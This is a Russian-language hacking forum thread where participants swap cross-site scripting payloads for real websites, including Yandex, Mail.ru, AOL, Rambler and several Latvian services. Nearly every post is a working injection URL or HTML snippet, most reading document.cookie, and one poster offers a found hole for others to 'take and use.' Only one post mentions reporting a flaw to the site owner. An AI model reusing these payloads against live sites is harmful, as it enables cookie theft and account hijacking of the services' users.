на yandex.ru создаем новое событие в календаре, назваагние пишем любое , в описание <img src = http://artfile.ru/funfoto/b/v/1939_26_186_ArtFile_ru.jpg onload = alert(123);> при просмотре события вылазит алерт"123" p.s сори еси не туда написал )
mail.ru Code: [COLOR=White]http://g1.botva.mail.ru/registration.php?race=1<'><script>alert(document.cookie)</script>[/COLOR]
То же самое и тут (PREF TM LM S) такая же трабла и с AOL например: Code: http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script> просто это не те которые нужны. но идея с переводом документа хорошая
там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку Code: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
пассивная XSS на рамблер, только что нашел Code: http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203 Code: http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910 Правда в этой строке их до фига и больше...
xss mail.ru Code: http://wifi.mail.ru/comments.html?point_id=6568&thread="><script>alert(document.cookie)</script> xss yandex.ru Code: http://images.yandex.ru/cgi-bin/customize.pl?retpath=http://yandex.ru/yandsearch?text="><script>alert(document.cookie)</script> Сам искал!
Вот пару месяцев назад нашел,думал буду пользоватся,ща как-то не пригодилось так чтоб зря не пропадала берите пользуйтесь на здоровье! http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
пассивка на рамблере строка Найти забаненного PHP: <img src=foo.png onerror=alert(document.cookie) /> еще одна пассивка на рамблер PHP: http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0¤cy=RUR
это тоже твой xss, нашел уже с твоей подсказкой http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3v')</script> от Sinva подправил https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл улови какая разница между вышестоящим и этим урл ниже как только догонишь, найдешь кучу пассивных xss на майле не забудь убрать пробелы
one.lv PHP: http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
pochta.ru http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
inbox.lv забугорный сайтец. http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл... http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Там в поиске еще активка есть)
